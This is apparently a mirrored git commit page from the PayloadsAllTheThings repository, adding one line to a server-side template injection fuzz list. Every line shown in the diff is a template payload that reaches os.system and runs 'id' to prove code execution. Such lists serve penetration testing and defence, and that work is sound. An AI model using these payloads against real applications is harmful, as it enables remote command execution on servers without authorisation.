mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Update ssti.fuzz
This commit is contained in:
parent
b0f90090c1
commit
cad01e9f31
1 changed files with 1 additions and 0 deletions
|
@ -56,3 +56,4 @@ ${self.module.filters.compat.inspect.os.system("id")}
|
|||
${self.module.runtime.compat.inspect.os.system("id")}
|
||||
${self.module.runtime.exceptions.util.os.system("id")}
|
||||
${self.template.__init__.__globals__['os'].system('id')}
|
||||
${self.module.cache.util.compat.inspect.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue